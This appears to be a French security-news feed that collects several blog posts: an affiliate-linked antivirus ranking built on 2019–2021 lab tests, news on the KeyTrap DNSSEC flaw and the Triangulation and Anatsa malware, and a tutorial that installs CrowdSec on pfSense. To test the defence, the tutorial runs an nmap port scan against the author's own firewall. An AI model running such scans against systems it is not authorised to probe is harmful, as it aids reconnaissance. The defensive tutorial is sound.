Récemment, c’est Avast Software – l’éditeur des logiciels antivirus Avast et AVG – qui a fait l’actualité à ce sujet. Il a été rapporté que l’éditeur collectait pendant des années les données de navigation web de leurs utilisateurs. Seuls les utilisateurs de la version gratuite d’Avast et d’AVG sont concernés par cette exploitation commerciale de leurs données. Sur la version payante, aucune collecte de données n’est effectuée.

La collecte de données dans Avast Free Antivirus

Les utilisateurs ont certes toujours eu la possibilité de refuser de partager leurs données mais il fallait pour cela fouiller dans les options du logiciel. Bon point, Avast Software a depuis peu mis en place un choix explicite d’acceptation ou de refus sur la collecte des données lors de l’installation des versions gratuites d’Avast et d’AVG.

Avast et AVG ne sont pas des cas isolés, les autres logiciels antivirus gratuits font de même.

Pour résumer : avec un antivirus gratuit, vos données personnelles sont collectées et vendues. Avec un antivirus payant, aucune collecte de données n’est réalisée.

> Fonctionnalités

Les antivirus payants ont plus de fonctionnalités liées à la sécurité que leurs homologues gratuits.

Prenons l’exemple de l’antivirus Avast :

  • Avast Free Antivirus (la version gratuite) bloque les virus et autres malwares, détecte les vulnérabilités des réseaux et dispose d’un gestionnaire de mots de passe.
  • Avast Premium Security (la version payante) a les mêmes fonctionnalités + protège contre le piratage du DNS, intègre une sandbox, bloque les e-mails indésirables, intègre un pare-feu avancé, bloque les ransomwares, intègre un outil de mise à jour automatique des applications
Avast : antivirus gratuit vs antivirus payant

Comme vous pouvez le voir, les antivirus payants protègent les ordinateurs sur plusieurs fronts tandis que les antivirus gratuits se contentent du minimum. Malgré tout, le niveau de protection face aux malwares entre un antivirus gratuit et un antivirus payant est identique.

> Publicité

Contrairement aux antivirus payants, les antivirus gratuits affichent de la publicité dans Windows.

Le plus souvent, ce sont des publicités en rapport avec des produits de l’éditeur.

Publicités dans AVG Antivirus

Selon votre tolérance à la publicité, le choix d’un antivirus payant peut être synonyme de tranquillité.

Quelle solution : Antivirus, Internet Security, Total Security… ?

Les logiciels antivirus sont disponibles en plusieurs versions. La plupart du temps, il existe une version gratuite et plusieurs versions payantes.

Par exemple chez Kaspersky Lab, quatre versions de l’antivirus Kaspersky sont disponibles :

  • Kaspersky Anti-Virus (gratuit) ;
  • Kaspersky Internet Security (payant – €);
  • Kaspersky Total Security (payant – €€);
  • Kaspersky Security Cloud (payant – €€€).
Solutions antivirus de Kaspersky

Le choix d’une version plutôt qu’une autre dépendra des domaines où vous avez besoin d’être protégé.

Selon la version choisie, en plus du module anti-virus (qui protège des logiciels et des sites web malveillants), vous aurez accès à :

  • une protection contre les e-mails malveillants (spam, phishing…) ;
  • un pare-feu avancé qui bloque tous les programmes qui n’ont pas été explicitement autorisés à communiquer sur Internet, empêchant ainsi les malwares de télécharger du contenu malveillant. Contrairement au pare-feu Windows, il bloque automatiquement les connexions sortantes.
  • une sandbox (bac à sable) qui permet d’exécuter un logiciel dans un environnement sécurisé sans risque de le voir infecter le système ;
  • un outil de mise à jour automatique des logiciels ;
  • un gestionnaire de mots de passe ;
  • un VPN qui chiffre la connexion Internet ;

L’agrégation de tous ces modules forment ce que l’on appelle une suite de sécurité, souvent appelée Internet Security, Total Security ou Premium Security selon les éditeurs d’antivirus.

Quel est le MEILLEUR antivirus ?

La réponse est simple : il n’y a pas de meilleur antivirus.

Parmi tous les antivirus qui existent, aucun n’est imperméable. Les virus et autres logiciels malveillants mutent, évoluent en permanence et ont toujours un temps d’avance. Ce sont toujours aux antivirus de s’adapter aux nouvelles menaces qui font des dégâts avant que les éditeurs d’antivirus ne trouvent des solutions pour les bloquer et que les utilisateurs mettent à jour leur logiciel antivirus.

Tous les éditeurs d’antivirus

Il n’y a pas de « meilleur antivirus », le Saint Graal tant recherché par beaucoup d’internautes. Chaque antivirus a ses forces et ses faiblesses, ils sont tous plus ou moins efficaces dans la détection d’un certain type de malware, la capacité à les neutraliser, à bloquer les sites web malveillants, à avoir un impact mesuré sur les performances du système…

Il n’existe pas un antivirus qui surpasse tous les autres. Il y a seulement des antivirus mieux que d’autres dans certains domaines.

Windows Defender

Si vous êtes sur Windows 11 ou Windows 10, sachez que celui-ci inclut nativement un antivirus made in Microsoft : Windows Defender.

Windows Defender Antivirus dans Windows 10

D’après les tests réalisés par AV-Comparatives, Windows Defender obtient de bons résultats dans la détection et la suppression des virus et autres malwares.

Cependant, il a un taux de détection de faux postifs assez élevé et peut avoir un impact négatif sur les performances du système : il se montre en effet assez handicapant lors de copies de fichiers (attention donc si vous effectuez des sauvegardes régulières) et lors de processus de compression/décompression d’archives ZIP.

Vous pouvez donc vous en contenter pour protéger votre PC contre les virus. L’utilisation d’un autre antivirus gratuit comme Avast Free Antivirus peut vous être utile (il obtient de meilleurs scores dans la détection/suppression de virus, les faux positifs et les performances) si vous en avez besoin.

Attention aux comparatifs antivirus !

Ne vous fiez pas aveuglément aux comparatifs antivirus que l’on trouve un peu partout sur Internet.

Les sites web qui les proposent sont souvent rémunérés par les éditeurs des logiciels antivirus pour placer leur poulain en bonne position dans le classement final ; quand ce n’est pas le montant de la commission qui pousse l’éditeur du site web a placé un antivirus plutôt qu’un autre en haut du tableau.

Des comparatifs antivirus douteux (recherche Google)

Fiez-vous plutôt à des professionnels indépendants qui testent les logiciels anti-virus avec déontologie comme AV-Comparatives, AV-TEST ou Anti-Malware Test Lab.

Avant d’acheter un antivirus

Si vous comptez acheter un antivirus payant, testez-le avant de passer à la caisse. La plupart des éditeurs d’antivirus proposent une version d’essai gratuite de 30 jours.

Bitdefender Internet Security : version d’évaluation gratuite de 30 jours

Les versions d’évaluation vous permettront de tester l’antivirus et de voir s’il provoque des lenteurs ou des bugs sur votre ordinateur.

Si vous êtes satisfait, vous pouvez acheter le logiciel antivirus sans craintes !

Liste des antivirus à privilégier

Des logiciels antivirus, il y en a à la pelle.

Parmi ceux-là, il y a des roguewares, des faux logiciel de sécurité qui imitent un antivirus ou une autre solution de sécurité. Ce sont des logiciels malveillants qu’il faut éviter.

Pour les éviter, voici une petite liste de logiciels antivirus considérés comme fiables et à privilégier :

Verdict : les meilleurs antivirus en 2024

À partir des rapports publiés par le laboratoire indépendant AV-Comparatives qui testent les logiciels antivirus pour Windows, voici les antivirus à privilégier.

Voici les rapports sur lesquels ce classement se basent :

Important : sachez que le choix de l’antivirus sera toujours critiqué par uns et les autres, certains autoproclamés « experts en sécurité ». Donc ne vous prenez pas la tête et ne remettez pas en cause votre choix si tonton André ou le petit Thibault vous donne son avis d’expert sur votre logiciel antivirus.

Ici, je vous fais part des logiciels antivirus à privilégier en me basant sur les résultats d’organismes compétents dans le domaine.

1er : Bitdefender Internet Security

Note :
9,5/10

Acheter :
acheter Bitdefender Internet Security (24,00 €)

Promo en cours : 24,00 € la 1re année (59,99 € ensuite)

Résultats :
> Protection contre les virus (local) : ★★★
> Protection contre les virus (web) : ★★★
> Protection contre les cyberattaques : ★★★
> Impact sur le système : ★★★
> Détection de faux positifs : ★★☆
> Prix : €€

2e : Kaspersky Internet Security

Note :
9/10

Acheter :
acheter Kaspersky Internet Security (34,99 €)

Promo en cours : 34,99 € la 1re année (49,99 € ensuite)

Résultats :
> Protection contre les virus (local) : ★★★
> Protection contre les virus (web) : ★★☆
> Protection contre les cyberattaques : ★★★
> Impact sur le système : ★★★
> Détection de faux positifs : ★★★
> Prix : €€

3e : Avast Premium Security

Note :
8/10

Acheter :
acheter Avast Premium Security (39,99 €)

Promo en cours : 39,99 € la 1re année (69,99 € ensuite)

Résultats :
> Protection contre les virus (local) : ★★★
> Protection contre les virus (web) : ★★☆
> Protection contre les cyberattaques : ★★☆
> Impact sur le système : ★★★
> Détection de faux positifs : ★★★
> Prix : €€€

4e : ESET Internet Security

Note :
7,5/10

Acheter :
acheter ESET Internet Security (49,96 €)

Résultats :
> Protection contre les virus (local) : ★☆☆
> Protection contre les virus (web) : ★★☆
> Protection contre les cyberattaques : ★★★
> Impact sur le système : ★★★
> Détection de faux positifs : ★★★
> Prix : €€

5e : McAfee Total Protection

Note :
7/10

Acheter :
acheter McAfee Total Protection (29,95 €)

Promo en cours : 29,95 € la 1re année (69,95 € ensuite)

Résultats :
> Protection contre les virus (local) : ★★☆
> Protection contre les virus (web) : ★★★
> Protection contre les cyberattaques : non testé
> Impact sur le système : ★★★
> Détection de faux positifs : ★★☆
> Prix : €€€

Résultats des tests antivirus

Vous trouverez ci-dessous les résultats des derniers tests réalisés par AV-Comparatives auprès de la plupart des logiciels antivirus du marché.

Protection contre les virus (local) – « Malware Protection Test » AV-Comparatives (mars 2021)
Protection contre les virus (web) – « Real-World Protection » AV-Comparatives (février-mai 2021)
Détection de faux positifs – False Alarm Test AV-Comparatives (mars 2021)
Impact sur le système – Performance Test AV-Comparatives (avril 2019)
Protection contre les cyberattaques – Enhanced Real-World Test AV-Comparatives (2020)

Pour chaque catégorie testée (protection contre les virus en local et sur le web, impact sur les performances du système, détection de faux positifs et protection contre les cyberattaques), voici les antivirus les plus et les moins performants.

  • Les antivirus les plus légers :
    Panda Antivirus
    (score de 3,0)
    Kaspersky Antivirus
    (score de 3,4)
    ESET Antivirus (score de 4,6)
  • L’antivirus le plus lourd :
    Microsoft Windows Defender (score de 28,4)
  • Les antivirus les plus efficaces contre les virus (local) :
    BitDefender Antivirus
    McAfee Antivirus
    Symantec Norton Antivirus

    VIPRE Antivirus
  • Les antivirus les moins efficaces contre les virus (local) :
    Microsoft Windows Defender
    K7 Antivirus
    Trend Micro Antivirus
  • L’antivirus le plus efficace contre les virus (web) :
    BitDefender Antivirus
  • L’antivirus les moins efficaces contre les virus (web) :
    Avira Antivirus
    ESET Antivirus
    Total AV Antivirus
  • Les antivirus avec le moins de faux positifs :
    ESET Antivirus
    Avast Antivirus
    Kaspersky Antivirus
    Total AV Antivirus
  • Les antivirus avec le plus de faux positifs :
    K7 Antivirus
    Malwaresbytes Antivirus
    Panda Antivirus
  • Les antivirus les plus efficaces contre les cyberattaques :
    BitDefender Antivirus
    ESET Antivirus

    Kaspersky Antivirus

Le meilleur antivirus gratuit

Si vous souhaitez ne pas investir dans un logiciel antivirus payant, vous pouvez vous tourner vers un antivirus gratuit.

Si vous êtes sur Windows 11 ou Windows 10, vous pouvez vous contenter de Windows Defender, l’antivirus inclus nativement. À noter : il peut avoir un impact négatif sur les performances du système lors de copies de fichiers ou lors de compression/décompression d’archives ZIP. Attention donc si vous réalisez ce type de tâches au quotidien. Aussi, c’est un des antivirus les moins efficaces contre les virus (en local).

Si vous souhaitez un autre antivirus gratuit plus léger et avec plus de protection, vous pouvez installer au choix :

Attention cependant, en installant un logiciel antivirus gratuit vous vous exposez à une collecte de vos données personnelles.

Dans la mesure du possible, investissez donc dans un logiciel antivirus payant !

Aller plus loin

En complément de votre logiciel antivirus qui vous protège en temps réel, effectuez des analyses périodiques (une fois par mois environ) avec un autre antivirus/anti-malware :

Aussi, retenez cette seule règle concernant les logiciels de sécurité : un antivirus, un pare-feu et c’est tout ! Ne multipliez pas les logiciels de protection, ils peuvent entrer en conflits et ralentir considérablement votre système, sans apporter aucun bénéfice en terme de sécurité.

D’ailleurs, en parlant du pare-feu, si vous souhaitez un guide pour savoir quel pare-feu choisir pour Windows : Meilleur pare-feu : quel pare-feu (firewall) choisir pour Windows ?

Enfin, sachez qu’un logiciel antivirus ne fait pas tout. Pour protéger efficacement votre ordinateur des virus, apprenez à vous en protéger en suivant ce guide :

Comment protéger son PC des virus et des pirates ?

Liens utiles

Source

Certificats HTTPS : comment vérifier la chaine ⛓️

Par : Mr Xhark
23 janvier 2024 à 14:05

L'installation d'un certificat HTTPS sur votre site web est une opération de routine mais qui peut réserver quelques surprises. On parle ici des certificats payants achetés sur une autorité tierce. Let's Encrypt étant un cas un peu à part je ne l'évoquerai pas ici.

Vous devez installer non seulement le certificat de votre site, mais aussi un ou plusieurs certificats intermédiaires, aussi appelés chaine de certificats. Si cette chaine est incorrecte vous risquez de provoquer des erreurs de certificat dans les navigateurs, et le visiteur fermera l'onglet.

Tous les navigateurs ne fonctionnent pas de la même façon, Firefox dispose par exemple de son propre magasin de certificats. Et c'est une bonne chose que de ne pas dépendre du business de Microsoft pour cela.

Une chaine de certificats, kezako ?

Avant d'aller plus loin il est essentiel de comprendre de quoi on parle.

Une chaîne de sécurité, également appelée chaîne de certificats, est une hiérarchie de certificats numériques utilisée pour les connexions sécurisées (certificat X509 ou HTTPS par abus de langage quand on parle d'un site web).

Root CA (Autorité de Certification Racine) : c'est l'autorité de certification principale qui émet des certificats de confiance. Il s'agit du point de départ de la chaîne de certificats. Les navigateurs et systèmes d'exploitation ont préinstallé les certificats de ces autorités racines pour établir une confiance de base (cf business de Microsoft plus haut).

SubCA (Autorité de Certification Intermédiaire/subordonnée) : ces autorités intermédiaires sont situées entre la racine et le certificat de serveur. Elles sont utilisées pour déléguer la tâche de délivrance de certificats aux entités finales, telles que les serveurs web. Les certificats de ces autorités intermédiaires sont signés par l'autorité racine (rootCA).

Certificat (SSL/TLS) : il est émis par une autorité intermédiaire (subCA) et est utilisé par un serveur pour prouver son identité aux utilisateurs. Ce certificat contient la clé publique du serveur et est signé par la clé privée de l'autorité intermédiaire (lien mathématique).

Lorsqu'un utilisateur visite un site web sécurisé, le navigateur vérifie la validité du certificat en remontant la chaîne jusqu'à l'autorité racine. Si la vérification réussit, la connexion est considérée comme sécurisée, assurant ainsi l'authenticité du site et le chiffrement des données échangées.

Erreur : "votre connexion n'est pas privée"

Ou encore :

"risque probable pour votre sécurité : firefox a détecté une menace de sécurité potentielle et n'a pas poursuivi vers..." avec Firefox.

Une chaîne de certificat mal configurée peut fonctionner dans certains navigateurs mais pas dans d'autres. Par exemple : le site fonctionne sur desktop mais pas sur mobile. De plus, lorsque vous renouvelez votre certificat, il se peut que vous deviez installer de nouveaux certificats intermédiaires.

Pour vérifier que le certificat est correctement installé tout le monde utilise Qualys ou équivalent. C'est très pratique mais un peu long et parfois un peu indigeste si vous voulez simplement vérifier votre chaine de certificat.

whatsmychaincert.com

C'est pourquoi j'utilise le site whatsmychaincert.com, aussi simple qu'utile : il indique si votre chaine est valide ou non.

Si votre chaine n'est pas valable il vous indique quelle chaîne vous devriez servir et vous aide à configurer votre serveur : Apache, nginx, postfix, stunnel etc. Soit en collant le certificat (publique, ne mettez pas ici votre clé privée!), soit directement depuis l'URL du site.

Il vous propose ensuite de télécharger la chaine que vous n'aurez plus qu'à utiliser ce fichier sur votre serveur :

Conclusion

Ce site m'est très utile au quotidien. En effet il n'est pas rare d'avoir aucune erreur sur un navigateur desktop mais des erreurs sur mobile, que ce soit dans une application, via une API ou un outil (wget, cURL).

Je le trouve fiable et s'il me dit que tout est OK alors le problème est ailleurs que dans le chaine de certificat / certificat.

➡ whatsmychaincert.com

Vous n'aimez pas le RSS : abonnez-vous par email 📥
Vous devriez me suivre sur Twitter : @xhark

Article original écrit par Mr Xhark publié sur Blogmotion le 23/01/2024 | Pas de commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Cet article Certificats HTTPS : comment vérifier la chaine ⛓️ provient de : on Blogmotion.

Triangulation : le malware iPhone et macOS

Par : Mr Xhark
1 février 2024 à 08:00

Sylvqin revient sur le malware nommé Triangulation. Un malware qui a poutré iPhone et MacOS grâce à une faille 0day dans iMessage.

Et oui, la sécurité par l'obscurité est loin d'être la meilleure approche, une preuve de plus s'il en fallait une. J'ai trouvé la technique du triangle assez... inattendue pour savoir sur quel modèle d'iPhone le script tourne.

Encore une belle enquête de Sylvqin avec l'apparition bien appréciée de Mathis Hammel qui rentre dans le détail technique.

Vous n'aimez pas le RSS : abonnez-vous par email 📥
Vous devriez me suivre sur Twitter : @xhark

Article original écrit par Mr Xhark publié sur Blogmotion le 01/02/2024 | 2 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Cet article Triangulation : le malware iPhone et macOS provient de : on Blogmotion.

DNSSEC : un seul paquet peut perturber l’accès à Internet avec l’attaque KeyTrap

18 février 2024 à 13:51

L'attaque KeyTrap, c'est le nom donné à une nouvelle vulnérabilité découverte dans DNSSEC. Elle affecte tous les services et toutes les implémentations de DNS populaires, y compris bind9, dnsmasq, PowerDNS Recursor ainsi que le serveur DNS de Windows Server. Faisons le point.

Pour rappel, DNSSEC est une extension du DNS qui améliore la sécurité du service DNS grâce à l'ajout de signatures afin de pouvoir authentifier les réponses. Nous en avions parlé dans ce tutoriel : comment configurer DNSSEC sur Windows Server 2022 ?

En ce qui concerne la faille de sécurité KeyTrape, elle est associée à la référence CVE-2023-50387, et elle a été découverte par des chercheurs et experts allemands, issus de l'institut de recherche ATHENE, de l'université Goethe de Francfort, du Fraunhofer SIT et de l'université technique de Darmstadt.

D'après eux, cette vulnérabilité est présente dans DNSSEC depuis plus de 20 ans ! Elle est liée au fonctionnement de DNSSEC, notamment dans la gestion des clés cryptographiques. En exploitant cette vulnérabilité, il est possible d'effectuer un déni de service sur le système DNS pris pour cible. En effet, à partir d'une seule requête, la réponse retournée par le service DNS peut être retardée de 56 secondes à 16 heures (en fonction du type de service).

Quels sont les services et serveurs DNS affectés ?

D'après les chercheurs : "Avec KeyTrap, un attaquant pourrait complètement désactiver de grandes parties de l'Internet mondial", preuve que cette vulnérabilité est importante. Ceci se justifie par le fait qu'elle impacte les fournisseurs de services DNS les plus importants, tels que Google et Cloudflare.

Voici un tableau publié par les chercheurs en sécurité (visible dans ce rapport) où l'on peut voir quelles sont les applications et les services vulnérables :

DNSSEC - KeyTrap - Tableau

Depuis novembre 2023, des travaux sont en cours chez Google, Cloudflare, mais également chez Akamai pour déployer des mesures d'atténuations permettant de se protéger de cette vulnérabilité liée au fonctionnement de DNSSEC. Du côté de chez Microsoft, il semblerait que la mise à jour cumulative pour Windows Server déployée à l'occasion du Patch Tuesday de Février 2024 permette de corriger cette vulnérabilité.

D'après un rapport d'Akamai : "environ 35 % des utilisateurs d'Internet basés aux États-Unis et 30 % des utilisateurs d'Internet dans le monde utilisent des résolveurs DNS qui utilisent la validation DNSSEC et sont donc vulnérables à KeyTrap.".

Source

The post DNSSEC : un seul paquet peut perturber l’accès à Internet avec l’attaque KeyTrap first appeared on IT-Connect.

Installer CrowdSec sur un pare-feu PfSense pour protéger son réseau

18 février 2024 à 17:00

I. Présentation

Dans ce tutoriel, nous allons voir comment installer CrowdSec sur un pare-feu PfSense dans le but de bloquer les adresses IP malveillantes, notamment à l'origine d'attaques brute force, de scans de port et de recherche de vulnérabilités web (HTTP).

CrowdSec, que nous avons déjà abordé au sein de plusieurs articles, est une solution gratuite et open source capable de détecter et bloquer les attaques à destination des machines, grâce à la prise en charge de nombreux scénarios de détection. CrowdSec prend en charge Linux, Windows Server, FreeBSD, et il peut être mis en place sur certains firewalls comme PfSense et OPNSense.

Lorsqu'il est en place sur un firewall PfSense, CrowdSec va analyser plusieurs journaux du système pour identifier les comportements malveillants et bloquer les adresses IP associées. En complément, les adresses IP présentes dans les listes communautaires de CrowdSec sont également bloquées.

Il est important de préciser que si vous utilisez HAProxy en tant que reverse proxy sur un pare-feu PfSense, vous pouvez également configurer CrowdSec pour qu'il surveille les logs de HAProxy pour détecter les attaques Web. C'est très intéressant, et ce scénario sera probablement détaillé dans un article complémentaire.

Pour vous aider à mettre en place ce tutoriel, voici quelques ressources supplémentaires :

II. Prérequis pour suivre ce tutoriel

Pour suivre ce tutoriel, vous avez besoin d'un pare-feu PfSense déjà en place car nous n'allons pas voir l'installation. Pour ceux qui le souhaitent, vous pouvez utiliser le Lab basé sur VMware Workstation comme point de départ, si vous désirez vous entrainer. C'est ce que je fais pour ma part.

En complément, une machine virtuelle sous Kali Linux sera utilisée pour simuler une attaque (en se positionnant côté WAN). Mais, vous pouvez directement utiliser votre hôte physique sans problème (sous Windows, vous pouvez installer l'outil Zenmap, par exemple).

III. Installer CrowdSec sur PfSense

A. Accéder au shell de PfSense

La première étape consiste à installer un ensemble de paquets sur le pare-feu PfSense afin de pouvoir intégrer CrowdSec. Pour exécuter des commandes shell sur PfSense, il y a trois options :

  • Utiliser le mode console (via l'hyperviseur, par exemple)
  • Utiliser la console distante via une connexion SSH
  • Utiliser la fonction "Command Prompt" accessible via l'interface web de PfSense (dans le menu "Diagnostics").

Dans le cas présent, je pensais utiliser la fonction "Command Prompt" mais les commandes ne sont pas passées. Il est préférable de passer directement via la console.

PfSense - Menu Diagnostique commandes

Si vous avez besoin d'activer le SSH, cliquez sur "System" puis "Advanced". À cet endroit, il y a une section "Secure Shell" où vous pouvez activer le SSH et définir un port personnalisé.

PfSense - Activer accès SSH

Ensuite, vous devez vous connecter en SSH à PfSense. Vous pouvez utiliser le client OpenSSH de Windows ou Linux, ou une autre application telle que PuTTY.

Voici comment se connecter sur un pare-feu avec l'adresse IP "192.168.100.1" avec le compte "admin", où le port SSH est 9922.

ssh [email protected] -p 9922

La première fois, vous devez accepter l'empreinte en indiquant "yes". Ensuite, saisissez le mot de passe et validez. Pour accéder au shell, choisissez l'option "8".

B. Installer CrowdSec, le paquet PfSense et le bouncer Firewall

Désormais, il va falloir installer CrowdSec, son paquet pour PfSense, le bouncer Firewall et des dépendances.

Pour cela, vous devez récupérer les liens vers les dernières versions en vous référant au GitHub de CrowdSec. Autrement dit, les commandes "pkg add" ci-dessous pointent vers les versions actuelles, mais ce ne seront pas forcément les dernières lorsque vous allez suivre ce tutoriel.

Avant d'installer les paquets, nous allons définir la variable "IGNORE_OSVERSION" à "yes" pour éviter les avertissements lors de l'installation des paquets (dû à la différence entre la version du paquet et la version de FreeBSD sur laquelle est basée PfSense).

Dans la console, saisissez cette commande :

setenv IGNORE_OSVERSION yes

Puis exécutez les commandes suivantes pour télécharger et installer les paquets :

pkg add -f https://github.com/crowdsecurity/pfSense-pkg-crowdsec/releases/download/v0.1.3/abseil-20230125.3.pkg
pkg add -f https://github.com/crowdsecurity/pfSense-pkg-crowdsec/releases/download/v0.1.3/re2-20231101.pkg
pkg add -f https://github.com/crowdsecurity/pfSense-pkg-crowdsec/releases/download/v0.1.3/crowdsec-1.6.0.pkg
pkg add -f https://github.com/crowdsecurity/pfSense-pkg-crowdsec/releases/download/v0.1.3/crowdsec-firewall-bouncer-0.0.28_3.pkg
pkg add -f https://github.com/crowdsecurity/pfSense-pkg-crowdsec/releases/download/v0.1.3/pfSense-pkg-crowdsec-0.1.3.pkg
install crowdsec pfsense

L'installation de CrowdSec est effectuée à l'emplacement suivant :

/usr/local/etc/crowdsec/

Par la suite, si vous avez besoin de redémarrer CrowdSec, utilisez cette commande (adaptez également pour l'arrêter / le démarrer) :

service crowdsec.sh restart

Avant de poursuivre, vous devez redémarrer votre pare-feu PfSense, sinon CrowdSec ne sera pas actif, et la ligne de commande "cscli" indisponible également.

Voilà, vous venez d'installer CrowdSec sur PfSense !

IV. Configurer CrowdSec sur PfSense

Sachez que tout le jeu de commandes habituel permettant de configurer et d'utiliser CrowdSec est disponible : cscli. Vous pouvez aussi faire l'essentiel de la configuration à partir de l'interface d'administration de PfSense.

À partir du menu, sous "Services", choisissez "CrowdSec".

PfSense - Menu Services CrowdSec

Par défaut, et c'est plutôt appréciable, CrowdSec est préconfiguré pour être opérationnel et être capable d'analyser les journaux de PfSense. Pour en savoir plus sur les fichiers de logs parsés par CrowdSec, regardez ces deux fichiers :

/usr/local/etc/crowdsec/acquis.yaml
/usr/local/etc/crowdsec/acquis.d/pfsense.yaml

Vous devez tout de même réviser la configuration proposée...

Configurer CrowdSec sur PfSense - Etape 1

Vous pouvez constater que la "Local API" (LAPI) est activée. Elle est utilisée par CrowdSec pour le partage d'informations entre plusieurs instances. Ici, c'est en local. Au cas où il s'agirait d'un déploiement avec plusieurs machines qui s'échangent les informations (adresses IP bloquées, par exemple), il faudrait s'intéresser à la section "Remote API". Ici, ce n'est pas nécessaire.

Configurer CrowdSec sur PfSense - Etape 2

Descendez dans la page... Nous pouvons constater que CrowdSec est actif sur toutes les interfaces de PfSense, en entrée (flux malveillants entrants). Il est important de préciser que les règles de pare-feu créées par CrowdSec ne sont pas visibles dans la liste des règles de PfSense que l'on peut afficher en mode web, mais uniquement en ligne de commande.

Configurer CrowdSec sur PfSense - Etape 3

Cliquez sur le bouton "Save" pour valider la configuration et démarrer CrowdSec.

Désormais, dans le menu "Status", cliquez sur "CrowdSec Status".

Configurer CrowdSec sur PfSense - Etape 4

Ici, vous pouvez visualiser l'état général de CrowdSec, ainsi qu'obtenir la liste des bouncers, des collections, des scénarios, etc... Mais aussi lister les dernières alertes et les décisions. Pour rappel, une décision correspond au fait de bannir une adresse IP (action par défaut).

Voici la liste des collections actuellement installées :

Nous pourrions en ajouter d'autres à partir de la ligne de commande (cscli collections install). Ceci peut s'avérer utile si votre pare-feu PfSense héberge d'autres services, comme un reverse proxy HAProxy, par exemple.

Enfin, il y a la section "CrowdSec Metrics" accessible via le menu "Diagnostics" de PfSense qui donne des statistiques plus détaillées sur l'activité de CrowdSec sur notre pare-feu. Nous pouvons entre autres visualiser quels sont les fichiers de log analysés par CrowdSec et obtenir des statistiques à leur sujet.

PfSense - CrowdSec Metrics

V. Simuler un scan de ports sur PfSense

A partir de l'outil NMAP, nous allons pouvoir réaliser un scan de ports sur l'adresse IP de l'interface WAN du PfSense. Dans cet exemple, il s'agit de "192.168.1.60", mais en production, il s'agirait de votre adresse IP publique. Vous pouvez utiliser NMAP sur Linux, via WSL, ou sinon en mode graphique sous Windows avec Zenmap.

Voici la commande à exécuter pour faire un scan de port à la recherche de services fréquents :

nmap -sV 192.168.1.60

Le scan a permis de détecter que le port 80/tcp (http) était ouvert. C'est normal, car une règle de NAT redirige les flux HTTP vers un serveur Web en DMZ. Il n'a pas obtenu d'autres réponses.

Scan de port avec nmap - Exemple

Pour cause, la machine à l'origine du scan a été bannie par CrowdSec. Nous pouvons le voir dans le menu "Status" puis "CrowdSec", en accédant à l'onglet "Decisions". Cette adresse IP a été bannie à cause du scan de port, comme indiqué : pf-scan-multi_ports.

PfSense - Adresse IP bannie par CrowdSec

L'information est bien entendu visible à partir de la ligne de commande :

cscli decisions list 
PfSense - Exemple de cscli

Nous pouvons constater que CrowdSec est opérationnel et réactif sur notre pare-feu PfSense ! C'est un gros plus pour la protection de notre réseau !

VI. Conclusion

Suite à la mise en place de CrowdSec sur notre pare-feu PfSense, nous sommes en mesure de détecter et bloquer les adresses IP malveillantes. Ainsi, si une machine vient frapper à la porte de votre pare-feu pour voir quels sont les services ouverts, elle sera directement bannie.

Par la suite, nous verrons comment aller plus loin dans la détection et la configuration s'il y a un reverse proxy HAProxy en place sur le pare-feu PfSense. Pour aller plus loin, nous pourrions aussi déployer CrowdSec sur les serveurs de notre infrastructure et faire en sorte pour que toutes les décisions et alertes soient synchronisées entre les hôtes, en nous appuyant sur l'instance CrowdSec déployée sur PfSense comme point central.

The post Installer CrowdSec sur un pare-feu PfSense pour protéger son réseau first appeared on IT-Connect.

Magika, un outil open source de Google pour identifier des fichiers grâce à l’IA

19 février 2024 à 06:30

Magika, c'est le nom du nouvel outil de Google mis à disposition de la communauté et qui permet d'identifier les types de fichiers, rapidement, grâce à l'intelligence artificielle. Voici ce qu'il faut savoir !

Avec Magika, vous pouvez identifier facilement et rapidement les types de fichiers binaires et textuels. Déjà utilisé en interne par Google, il peut être utilisé par tout le monde dès à présent. Il s'installe sur une machine en locale en tant que paquet Python (via "pip install magika"), mais vous aussi l'utiliser à partir de ce site de démo. "Magika est déjà utilisé pour protéger des produits tels que Gmail, Drive et Safe Browsing, ainsi que par notre équipe VirusTotal", précise Google.

À partir d'un bel échantillon de 1 million de fichiers, Google a comparé les performances de Magika avec d'autres outils tels que Exiftool, Trid, File mime et File magic. L'entreprise américaine affirme que : "Magika surpasse les méthodes conventionnelles d'identification de fichiers en offrant une augmentation globale de 30% de la précision et jusqu'à 95% de précision supplémentaire sur des contenus traditionnellement difficiles à identifier, mais potentiellement problématiques, tels que VBA, JavaScript et PowerShell."

Magika parvient à être plus performant grâce à l'intelligence artificielle et au fait qu'il a été entrainé sur énormément de données. Pour être plus précis, il s'appuie sur ce que l'on appelle un "deep-learning model" et il est capable d'identifier le type d'un fichier en quelques millisecondes.

Voici le tableau récapitulatif publié par Google sur cette page :

Identifier les fichiers avec Magika

Je n'ai pas encore testé cet outil, mais il me semble très intéressant ! Attention, nous parlons bien d'identifier le type d'un fichier, ce qui n'indique pas s'il s'agit d'un fichier malveillant ou non, même si cela peut être un premier signe. L'exemple ci-dessous, publié par Google, montre que l'outil peut afficher le résultat pour l'ensemble des fichiers contenus dans un dossier :

Magika - Exemple

Pour Google, le déploiement de l'intelligence artificielle à grande échelle au sein des outils et services va jouer un rôle au niveau de la cybersécurité et faire pencher la balance en faveur des défenseurs, face aux attaques.

Qu'en pensez-vous ?

Source

The post Magika, un outil open source de Google pour identifier des fichiers grâce à l’IA first appeared on IT-Connect.

En Europe, le malware Anatsa a déjà infecté plus de 150 000 appareils Android

20 février 2024 à 06:30

Depuis plusieurs mois, le cheval de Troie bancaire Anatsa cible les appareils Android, et plus particulièrement les utilisateurs européens ! Pour se propager, il s'appuie sur des applications malveillantes diffusées par le Google Play Store. Faisons le point sur cette menace.

Les chercheurs en sécurité de ThreatFabric ont mis en ligne un rapport pour alerte sur l'activité du Trojan Anatsa. D'après eux, depuis le mois de novembre 2023, il est très actif et il a déjà infecté les appareils de 150 000 utilisateurs européens. Quand il est en place, Anatsa a pour objectif de voler vos identifiants bancaires pour vider vos comptes.

On parle de cinq campagnes différentes lancées à l'encontre des utilisateurs situés au Royaume-Uni, en Allemagne, en Espagne, en Slovaquie, en Slovénie et en République tchèque. Chaque campagne a pour objectif de cibler une zone géographique bien précise. Même si cela s'est intensifié ces derniers mois, ce n'est pas la première fois qu'Anatsa s'en prend aux utilisateurs européens. Le rapport technique de TheatFabric est disponible sur cette page.

